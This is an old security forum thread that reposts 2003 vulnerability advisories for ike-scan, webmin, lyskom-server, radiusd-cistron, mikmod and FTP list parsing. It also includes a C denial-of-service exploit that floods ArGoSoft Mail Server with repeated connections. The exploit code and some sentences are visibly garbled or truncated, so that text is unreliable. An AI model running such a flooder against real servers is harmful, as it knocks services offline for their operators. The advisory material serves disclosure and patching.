Jump to content

latest exploits


Recommended Posts

SRT2003-06-12-0853 - ike-scan local root format string issue

Product : ike-scan

Version : 1.0 & 1.1

Local format string issue in logging functions

What to do : Please upgrade ike-scan to version 1.2

In the course of performing security assessments and penetration tests

for their customers, http://www.nta-monitor.com has found that VPN

systems often provide full access to the internal network which makes

them tempting targets to an attacker.

In addition, many people assume that their VPN servers are invisible and

impenetrable which is a dangerous assumption given that research at NTA

shows that IPsec VPN systems can be discovered and the manufacturer

identified.

When this potential for discovery and identification is combined with

the fact that several VPN vulnerabilities have been reported in the past

few months, it would seem to be only a matter of time before hackers

start to target VPN systems.

With this in mind, NTA took the decision to raise awareness of this

serious industry problem by producing a white paper on how VPN servers

can be detected and identified, combined with the development of a

security-auditing program "ike-scan."

The concepts behind ike-scan can be located in the following pdf.

http://www.nta-monitor.com/ike-scan/whitepaper.pdf

In a default configuration ike-scan is not suid root. The suid bit is

not set during the install. As an admin you may have been tricked by a

user that was perhaps higher on the food chain than you and he really

wanted to use ike-scan so you had to chmod +s /usr/local/bin/ike-scan

for him. In other words there is potential for this to be exploited.

[root@Immunity root]# su - nobody

sh-2.05$ /usr/local/bin/ike-scan 127.0.0.1

ERROR: Could not bind UDP socket to local port 500

You need to be root, or ike-scan must be suid root to bind to ports below

1024.

Only one process may bind to a given port at any one time.

bind: Permission denied

Link to comment
Share on other sites


New webmin packages fix remote session ID spoofing

Package : webmin

Vulnerability : session ID spoofing

Problem-Type : remote

Debian-specific: no

miniserv.pl in the webmin package does not properly handle

metacharacters, such as line feeds and carriage returns, in

Base64-encoded strings used in Basic authentication. This

vulnerability allows remote attackers to spoof a session ID, and

thereby gain root privileges.

For the stable distribution (woody) this problem has been fixed in

version 0.94-7woody1.

The old stable distribution (potato) does not contain a webmin package.

For the unstable distribution (sid) this problem is fixed in version

1.070-1.

We recommend that you update your webmin package.

Upgrade Instructions

- --------------------

wget url

will fetch the file for you

dpkg -i file.deb

will install the referenced file.

If you are using the apt-get package manager, use the line for

sources.list as given below:

apt-get update

will update the internal database

apt-get upgrade

will install corrected packages

You may use an automated update by adding the resources from the

footer to the proper configuration.

Debian GNU/Linux 3.0 alias woody

- --------------------------------

Source archives:

http://security.debian.org/pool/updates/ma....94-7woody1.dsc

Size/MD5 checksum: 1126 68e911f1b0ca669eb8ba250e3c8e9188

http://security.debian.org/pool/updates/ma...7woody1.diff.gz

Size/MD5 checksum: 62990 1b96c1d52b1e3315861df4b9b788840e

http://security.debian.org/pool/updates/ma....94.orig.tar.gz

Size/MD5 checksum: 4831737 114c7ca2557c17faebb627a3de7acb97

Architecture independent components:

http://security.debian.org/pool/updates/ma...7woody1_all.deb

Size/MD5 checksum: 223628 1cce74d57c8893994e9e751732e3d03e

http://security.debian.org/pool/updates/ma...7woody1_all.deb

Size/MD5 checksum: 181942 e811fad93db9508eff56bf43e02af243

http://security.debian.org/pool/updates/ma...7woody1_all.deb

Size/MD5 checksum: 32474 61a7860de06b4c220bc5a073e0228c2f

-http://security.debian.org/pool/updates/main/w/webmin/webmin-cluster-software_0.94-

7woody1_all.deb

Size/MD5 checksum: 27498 fb58c07651016767072aa185582e1262

-http://security.debian.org/pool/updates/main/w/webmin/webmin-cluster-useradmin_0.94-

7woody1_all.deb

Size/MD5 checksum: 30588 db6836541741fcf9dfd4c11e0c8c5c86

http://security.debian.org/pool/updates/ma...7woody1_all.deb

Size/MD5 checksum: 1250010 c41276d145a5bea9e3a684a07892101c

http://security.debian.org/pool/updates/ma...7woody1_all.deb

Size/MD5 checksum: 26400 0627034bae9b0128afe4c12680a9825c

http://security.debian.org/pool/updates/ma...7woody1_all.deb

Size/MD5 checksum: 96410 19dcc297592c48c4c35bbc59e6e3559b

http://security.debian.org/pool/updates/ma...7woody1_all.deb

Size/MD5 checksum: 54614 dc151a7489baa9b03797412a4157b860

http://security.debian.org/pool/updates/ma...7woody1_all.deb

Size/MD5 checksum: 27162 90953255ab14012fd81134938f417953

http://security.debian.org/pool/updates/ma...7woody1_all.deb

Size/MD5 checksum: 21574 b5beb6b9e40c95da6e34797d7a29250e

http://security.debian.org/pool/updates/ma...7woody1_all.deb

Size/MD5 checksum: 47848 1d4fcb713365e15e08c95f26adb19bb9

http://security.debian.org/pool/updates/ma...7woody1_all.deb

Size/MD5 checksum: 31260 b5de1505b1e0fc0f1764fa0e836353db

http://security.debian.org/pool/updates/ma...7woody1_all.deb

Size/MD5 checksum: 103586 d9175bbe682efe11d4209a3d90cdab1b

http://security.debian.org/pool/updates/ma...7woody1_all.deb

Size/MD5 checksum: 62302 ec02f075f96ab2bcf0fcabb890f4bf59

http://security.debian.org/pool/updates/ma...7woody1_all.deb

Size/MD5 checksum: 119004 6afc4480515fb840dc7a7732a7d70b23

http://security.debian.org/pool/updates/ma...7woody1_all.deb

Size/MD5 checksum: 62448 fd5fc92c3c0d9259feba4a4869c518f6

http://security.debian.org/pool/updates/ma...7woody1_all.deb

Size/MD5 checksum: 196532 eff08cb3653eae193616237978423763

http://security.debian.org/pool/updates/ma...7woody1_all.deb

Size/MD5 checksum: 77372 11b4fe1d73410f1e43530508c128c604

http://security.debian.org/pool/updates/ma...7woody1_all.deb

Size/MD5 checksum: 20636 6f115702e3fa9b3d622b92d371e56b2c

http://security.debian.org/pool/updates/ma...7woody1_all.deb

Size/MD5 checksum: 37828 f28eefac5b5da0c7d3752aaf7440ff9c

http://security.debian.org/pool/updates/ma...7woody1_all.deb

Size/MD5 checksum: 87808 0b0f39e10987f90879f6367393940ef7

http://security.debian.org/pool/updates/ma...7woody1_all.deb

Size/MD5 checksum: 35618 5f3fb91dcb493ae563720a6e2d7a1626

http://security.debian.org/pool/updates/ma...7woody1_all.deb

Size/MD5 checksum: 134034 4b86de5f297b3662a3efd389510bd248

http://security.debian.org/pool/updates/ma...7woody1_all.deb

Size/MD5 checksum: 235074 ffb041417449df36ae7085c9344eb332

http://security.debian.org/pool/updates/ma...7woody1_all.deb

Size/MD5 checksum: 89148 64d9b960a740a5be9fab9eb79fb188fd

http://security.debian.org/pool/updates/ma...7woody1_all.deb

Size/MD5 checksum: 221836 7035074b9a76335e6103a30485e3134c

http://security.debian.org/pool/updates/ma...7woody1_all.deb

Size/MD5 checksum: 44078 4733ff267ebfc94ba0e6e6481873249d

http://security.debian.org/pool/updates/ma...7woody1_all.deb

Size/MD5 checksum: 8320 42484bc80e887649fb701adea4cf0c73

http://security.debian.org/pool/updates/ma...7woody1_all.deb

Size/MD5 checksum: 42774 8f62321c6243e85c61790b290efcc59b

http://security.debian.org/pool/updates/ma...7woody1_all.deb

Size/MD5 checksum: 26600 ce3679dc5bd620e803c881e15410bc09

http://security.debian.org/pool/updates/ma...7woody1_all.deb

Size/MD5 checksum: 110828 9fd579f5d5980ddae4768a0459835a99

http://security.debian.org/pool/updates/ma...7woody1_all.deb

Size/MD5 checksum: 31774 98f1456602b807a1a84bfcf6075ce9df

http://security.debian.org/pool/updates/ma...7woody1_all.deb

Size/MD5 checksum: 509038 75fb02b81e729cc0361ebf11d59ef59c

Intel IA-32 architecture:

http://security.debian.org/pool/updates/ma...woody1_i386.deb

Size/MD5 checksum: 29336 ab60b8d46f362e853f0b0417beb44655

These files will probably be moved into the stable distribution on its

next revision.

Link to comment
Share on other sites

New lyskom-server packages fix denial of service

Package : lyskom-server

Vulnerability : denial of service

Problem-Type : remote

Debian-specific: no

Calle Dybedahl discovered a bug in lyskom-server which could result in

a denial of service where an unauthenticated user could cause the

server to become unresponsive as it processes a large query.

For the stable distribution (woody) this problem has been fixed in

version 2.0.6-1woody1.

The old stable distribution (potato) does not contain a lyskom-server package.

For the unstable distribution (sid) this problem is fixed in version

2.0.7-2.

We recommend that you update your lyskom-server package.

Upgrade Instructions

- --------------------

wget url

will fetch the file for you

dpkg -i file.deb

will install the referenced file.

If you are using the apt-get package manager, use the line for

sources.list as given below:

apt-get update

will update the internal database

apt-get upgrade

will install corrected packages

You may use an automated update by adding the resources from the

footer to the proper configuration.

Debian GNU/Linux 3.0 alias woody

- --------------------------------

Source archives:

-http://security.debian.org/pool/updates/main/l/lyskom-server/lyskom-server_2.0.6-

1woody1.dsc

Size/MD5 checksum: 617 45f4f9b9a90bdfb7187dd31925412fbe

-http://security.debian.org/pool/updates/main/l/lyskom-server/lyskom-server_2.0.6-

1woody1.diff.gz

Size/MD5 checksum: 9653 0d434e207904d982615607169c86f5cb

http://security.debian.org/pool/updates/ma...0.6.orig.tar.gz

Size/MD5 checksum: 1408984 ac877a081c01ecfbeb0a4ea0194615f3

Alpha architecture:

-http://security.debian.org/pool/updates/main/l/lyskom-server/lyskom-server_2.0.6-

1woody1_alpha.deb

Size/MD5 checksum: 483592 19c29e3b2ccc5bb133a8a8c069f389f4

ARM architecture:

-http://security.debian.org/pool/updates/main/l/lyskom-server/lyskom-server_2.0.6-

1woody1_arm.deb

Size/MD5 checksum: 421020 4cd7f320487978f7e9eb7332abbab5b3

Intel IA-32 architecture:

-http://security.debian.org/pool/updates/main/l/lyskom-server/lyskom-server_2.0.6-

1woody1_i386.deb

Size/MD5 checksum: 408986 9273e651c49491c50b8b6871fc4fc520

Intel IA-64 architecture:

-http://security.debian.org/pool/updates/main/l/lyskom-server/lyskom-server_2.0.6-

1woody1_ia64.deb

Size/MD5 checksum: 552516 065eb6e6d00421f52bdb1e5ae98bddfd

HP Precision architecture:

-http://security.debian.org/pool/updates/main/l/lyskom-server/lyskom-server_2.0.6-

1woody1_hppa.deb

Size/MD5 checksum: 449420 d5cd68eca819eb4ef251910e51187dde

Motorola 680x0 architecture:

-http://security.debian.org/pool/updates/main/l/lyskom-server/lyskom-server_2.0.6-

1woody1_m68k.deb

Size/MD5 checksum: 392824 9e947f45837e6e27534a0cfe194b1de0

Big endian MIPS architecture:

-http://security.debian.org/pool/updates/main/l/lyskom-server/lyskom-server_2.0.6-

1woody1_mips.deb

Size/MD5 checksum: 461240 4fcc560c13ffbdac8615bbeb4c0bef5e

Little endian MIPS architecture:

-http://security.debian.org/pool/updates/main/l/lyskom-server/lyskom-server_2.0.6-

1woody1_mipsel.deb

Size/MD5 checksum: 460242 061edb1f105d7630c1561f80ed7b8378

PowerPC architecture:

-http://security.debian.org/pool/updates/main/l/lyskom-server/lyskom-server_2.0.6-

1woody1_powerpc.deb

Size/MD5 checksum: 418680 f13215dcb5a9b6bde29fa637b80e71c1

IBM S/390 architecture:

-http://security.debian.org/pool/updates/main/l/lyskom-server/lyskom-server_2.0.6-

1woody1_s390.deb

Size/MD5 checksum: 416048 c15aceed3c590a169a4511f95b494fc5

Sun Sparc architecture:

-http://security.debian.org/pool/updates/main/l/lyskom-server/lyskom-server_2.0.6-

1woody1_sparc.deb

Size/MD5 checksum: 425290 12dc8973ff9aa88a41136e6fd52abc34

These files will probably be moved into the stable distribution on its

next revision.

Link to comment
Share on other sites

Low risk vulnerabilities in ftp file list handling

Several ftp parsing libraries are vulnerable to attack by simply feeding

them too much data. While the library authors have taken care to be robust

in parsing ftp NLST returns they don't iterate the data as they receive it

but store the data until the NLST completes.

In the case of rpm a user using

rpm -Uvh *ftp://foo.bar.com/updates/*

and hitting a rogue server can be fed 1Gb of data at which point rpm does

a

In the case of gnome-1.x the gnome library string routines are used and

these use an int for size management. Gnome 2.x fixes this problem and uses

size_t so is not exploitable.

Even in the non vulnerable applications there are out of memory annoyance

value attacks as a result of this way of handling file lists.

This attack is not actually that useful fortunately. The end user has to

trigger the access, and has to accept >1Gb of data without getting

suspicious. In addition the gnome-1.x variant is only exploitable on

systems where sizeof(int)

I have not inspected other ftp NLST parsing applications but it seems people

should take a look to see who else is buffering too much data in RAM or

not checking for size wraps.

Gnome and RPM maintainers were informed in advance in April.

Link to comment
Share on other sites

Denial of Service Attack against ArGoSoft Mail Server Version 1.8

VULNERABLE VERSIONS: 1.8 (1.8.3.5)

NOT VULNERABLE VERSIONS: 1.8 Plus and 1.8 Prof

RISK: Medium

IMPACT: Denial of Service Attack

Remote DoS :

A security vulnerability in ArGoSoft Mail Server "Freeware" allows remote

attackers to crash the server by executing too much "get Request.

The command can be issued to the Mail server by everyone. The attacker

need no

authentification.

EXPLOIT

#include

#include

#include

#include

#include

int main(int argc, char *argv[])

{

int port, sockfd;

struct sockaddr_in server;

struct hostent *host;

char sendstring[1024];

strcpy(sendstring, "GET /index.html HTTP/1.0\n\n");

if(argc {

printf("Usage: %s [target] \n", argv[0]);

exit(0);

}

port = atoi(argv[2]);

host = gethostbyname(argv[1]);

if(host == NULL)

{

printf("Connection failed!...\n");

exit(0);

}

server.sin_family = AF_INET;

server.sin_port = htons(port);

server.sin_addr.s_addr = inet_addr((char*)argv[1]);

printf("Dos against ArGoSoft Mail Server Version 1.8 (1.8.3.5)\n");

for(;:)

{

if( (sockfd = socket(AF_INET,SOCK_STREAM,0)) {

printf("socket() failed!\n");

exit(0);

}

if(connect(sockfd, (struct sockaddr*)&server, sizeof(server)) {

printf("connect() failed!\n");

close(sockfd);

}

if (write(sockfd, sendstring, strlen(sendstring)) {

break;

}

close(sockfd);

}

printf("Attack done!...\n");

}

This error will produce an "crash" of the ArGoSoft Mail Server.

SOLUTIONS

No solution for the moment.

Link to comment
Share on other sites

New radiusd-cistron packages fix buffer overflow

Debian Security Advisory DSA 321-1 security@debian.org

http://www.debian.org/security/ Matt Zimmerman

June 13th, 2003 http://www.debian.org/security/faq

- --------------------------------------------------------------------------

Package : radiusd-cistron

Vulnerability : buffer overflow

Problem-Type : remote

Debian-specific: no

radiusd-cistron contains a bug allowing a buffer overflow when a long

NAS-Port attribute is received. This could allow a remote attacker to

execute arbitrary code on the with the privileges of the RADIUS daemon

(usually root).

For the stable distribution (woody) this problem has been fixed in

version 1.6.6-1woody1.

For the old stable distribution (potato), this problem will be fixed

in a later advisory.

For the unstable distribution (sid) this problem will be fixed soon.

We recommend that you update your radiusd-cistron package.

Upgrade Instructions

- --------------------

wget url

will fetch the file for you

dpkg -i file.deb

will install the referenced file.

If you are using the apt-get package manager, use the line for

sources.list as given below:

apt-get update

will update the internal database

apt-get upgrade

will install corrected packages

You may use an automated update by adding the resources from the

footer to the proper configuration.

Debian GNU/Linux 3.0 alias woody

- --------------------------------

Source archives:

-http://security.debian.org/pool/updates/main/r/radiusd-cistron/radiusd-cistron_1.6.6-

1woody1.dsc

Size/MD5 checksum: 611 b6a3c69ca08b1f6984147e64f7ddcaab

-http://security.debian.org/pool/updates/main/r/radiusd-cistron/radiusd-cistron_1.6.6-

1woody1.diff.gz

Size/MD5 checksum: 4221 ad563e14d3f3da713973cd23e97dcef5

http://security.debian.org/pool/updates/ma...6.6.orig.tar.gz

Size/MD5 checksum: 194154 16084870890fd2ec577dbe183b51a379

Alpha architecture:

-http://security.debian.org/pool/updates/main/r/radiusd-cistron/radiusd-cistron_1.6.6-

1woody1_alpha.deb

Size/MD5 checksum: 262652 b541753d08f0d124a9f48133eeac381e

ARM architecture:

-http://security.debian.org/pool/updates/main/r/radiusd-cistron/radiusd-cistron_1.6.6-

1woody1_arm.deb

Size/MD5 checksum: 235578 6277971c73bf52c22b5623f9131a8d9f

Intel IA-32 architecture:

-http://security.debian.org/pool/updates/main/r/radiusd-cistron/radiusd-cistron_1.6.6-

1woody1_i386.deb

Size/MD5 checksum: 231960 9ca72ec922c0fd80e22d05a06176b265

Intel IA-64 architecture:

-http://security.debian.org/pool/updates/main/r/radiusd-cistron/radiusd-cistron_1.6.6-

1woody1_ia64.deb

Size/MD5 checksum: 365566 ea7299686e6629039ecdf81abdebd5ee

HP Precision architecture:

-http://security.debian.org/pool/updates/main/r/radiusd-cistron/radiusd-cistron_1.6.6-

1woody1_hppa.deb

Size/MD5 checksum: 235502 886c9f6006c80dcf3c4c5305c76411b7

Motorola 680x0 architecture:

-http://security.debian.org/pool/updates/main/r/radiusd-cistron/radiusd-cistron_1.6.6-

1woody1_m68k.deb

Size/MD5 checksum: 225678 39c53545d15bb167550fd462a139fc35

Big endian MIPS architecture:

-http://security.debian.org/pool/updates/main/r/radiusd-cistron/radiusd-cistron_1.6.6-

1woody1_mips.deb

Size/MD5 checksum: 246130 3d98988fb2128bc26735c1c5b7a41cde

Little endian MIPS architecture:

-http://security.debian.org/pool/updates/main/r/radiusd-cistron/radiusd-cistron_1.6.6-

1woody1_mipsel.deb

Size/MD5 checksum: 245672 88e63e2d94973aa7e65176b81184ed80

PowerPC architecture:

-http://security.debian.org/pool/updates/main/r/radiusd-cistron/radiusd-cistron_1.6.6-

1woody1_powerpc.deb

Size/MD5 checksum: 229238 eb1d0a109bb66e3d39c902f561779afc

IBM S/390 architecture:

-http://security.debian.org/pool/updates/main/r/radiusd-cistron/radiusd-cistron_1.6.6-

1woody1_s390.deb

Size/MD5 checksum: 238530 396c1a07cc893b3d77a1ecfcbc0ee57a

Sun Sparc architecture:

-http://security.debian.org/pool/updates/main/r/radiusd-cistron/radiusd-cistron_1.6.6-

1woody1_sparc.deb

Size/MD5 checksum: 248882 0e39dd1a1310e1afedc4d39e2b8d2794

These files will probably be moved into the stable distribution on its

next revision.

- --------------------------------------------------------------------------------

-

For apt-get: deb http://security.debian.org/ stable/updates main

For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main

Mailing list: debian-security-announce@lists.debian.org

Package info: `apt-cache show ' and http://packages.debian.org/

Link to comment
Share on other sites

New mikmod packages fix buffer overflow

Debian Security Advisory DSA 320-1 security@debian.org

http://www.debian.org/security/ Matt Zimmerman

June 13th, 2003 http://www.debian.org/security/faq

- --------------------------------------------------------------------------

Package : mikmod

Vulnerability : buffer overflow

Problem-Type : local

Debian-specific: no

CVE Id : CAN-2003-0427

Ingo Saitz discovered a bug in mikmod whereby a long filename inside

an archive file can overflow a buffer when the archive is being read

by mikmod.

For the stable distribution (woody) this problem has been fixed in

version 3.1.6-4woody3.

For old stable distribution (potato) this problem has been fixed in

version 3.1.6-2potato3.

For the unstable distribution (sid) this problem is fixed in version

3.1.6-6.

We recommend that you update your mikmod package.

Upgrade Instructions

- --------------------

wget url

will fetch the file for you

dpkg -i file.deb

will install the referenced file.

If you are using the apt-get package manager, use the line for

sources.list as given below:

apt-get update

will update the internal database

apt-get upgrade

will install corrected packages

You may use an automated update by adding the resources from the

footer to the proper configuration.

Debian GNU/Linux 2.2 alias potato

- ---------------------------------

Source archives:

http://security.debian.org/pool/updates/ma....6-2potato3.dsc

Size/MD5 checksum: 595 d0a811016b5025b327eea822373f12d5

http://security.debian.org/pool/updates/ma...potato3.diff.gz

Size/MD5 checksum: 6207 2ce7c29ac4c12632de56a1db093982f7

http://security.debian.org/pool/updates/ma...1.6.orig.tar.gz

Size/MD5 checksum: 134827 71d8142ae3ae27034535913e906b1384

Alpha architecture:

http://security.debian.org/pool/updates/ma...tato3_alpha.deb

Size/MD5 checksum: 62968 0c0d4ff734a7c02e4d8c862bb3745713

ARM architecture:

http://security.debian.org/pool/updates/ma...potato3_arm.deb

Size/MD5 checksum: 52588 7d5da70323e8549fc7cf5528173f3d1d

Intel IA-32 architecture:

http://security.debian.org/pool/updates/ma...otato3_i386.deb

Size/MD5 checksum: 50666 f00f6100852c6a25be4909e861368877

Motorola 680x0 architecture:

http://security.debian.org/pool/updates/ma...otato3_m68k.deb

Size/MD5 checksum: 48942 390d71cc5d5f98e84e077961740b9608

PowerPC architecture:

http://security.debian.org/pool/updates/ma...to3_powerpc.deb

Size/MD5 checksum: 53578 ef6419433633f01244eafeb7b61d0e6c

Sun Sparc architecture:

http://security.debian.org/pool/updates/ma...tato3_sparc.deb

Size/MD5 checksum: 54836 ca9367c16507f4ed6d247cc7001d777a

Debian GNU/Linux 3.0 alias woody

- --------------------------------

Source archives:

http://security.debian.org/pool/updates/ma...1.6-4woody3.dsc

Size/MD5 checksum: 608 b52405fb77329efddae915e145a9751d

http://security.debian.org/pool/updates/ma...4woody3.diff.gz

Size/MD5 checksum: 9726 35080e8530e9924be4d86aafbd31b84d

http://security.debian.org/pool/updates/ma...1.6.orig.tar.gz

Size/MD5 checksum: 134827 71d8142ae3ae27034535913e906b1384

Alpha architecture:

http://security.debian.org/pool/updates/ma...oody3_alpha.deb

Size/MD5 checksum: 62712 fe5456aa0ca7a1819fd1bb87b82bde1a

ARM architecture:

http://security.debian.org/pool/updates/ma...4woody3_arm.deb

Size/MD5 checksum: 52602 d75974481a2b2e23c47a7f700bf878e5

Intel IA-32 architecture:

http://security.debian.org/pool/updates/ma...woody3_i386.deb

Size/MD5 checksum: 50578 fde5b864a91bdddf1b07720af26cf5d5

Intel IA-64 architecture:

http://security.debian.org/pool/updates/ma...woody3_ia64.deb

Size/MD5 checksum: 76108 ad1cbef734d43f5e0fa5bad3c7f1cd72

HP Precision architecture:

http://security.debian.org/pool/updates/ma...woody3_hppa.deb

Size/MD5 checksum: 58482 9edb50e45214bc0b3225f5070df2b59f

Motorola 680x0 architecture:

http://security.debian.org/pool/updates/ma...woody3_m68k.deb

Size/MD5 checksum: 48554 a52f8913418501bf6a4b103e14636436

Big endian MIPS architecture:

http://security.debian.org/pool/updates/ma...woody3_mips.deb

Size/MD5 checksum: 57352 4edbef3712ec7220cdbe410c61aa8406

Little endian MIPS architecture:

http://security.debian.org/pool/updates/ma...ody3_mipsel.deb

Size/MD5 checksum: 57538 f0846374f89bc626f6ed29fd82bbd4af

PowerPC architecture:

http://security.debian.org/pool/updates/ma...dy3_powerpc.deb

Size/MD5 checksum: 53758 9a8e2a41cf260e5eecfd0472f2f574e6

IBM S/390 architecture:

http://security.debian.org/pool/updates/ma...woody3_s390.deb

Size/MD5 checksum: 53038 bddc8a9dcdea2b4386b5d5a4b3d281e1

Sun Sparc architecture:

http://security.debian.org/pool/updates/ma...oody3_sparc.deb

Size/MD5 checksum: 52786 9da2c9dc87e8c9d742483e5929c2e90f

These files will probably be moved into the stable distribution on its

next revision.

- --------------------------------------------------------------------------------

-

For apt-get: deb http://security.debian.org/ stable/updates main

For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main

Mailing list: debian-security-announce@lists.debian.org

Package info: `apt-cache show ' and http://packages.debian.org/

Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...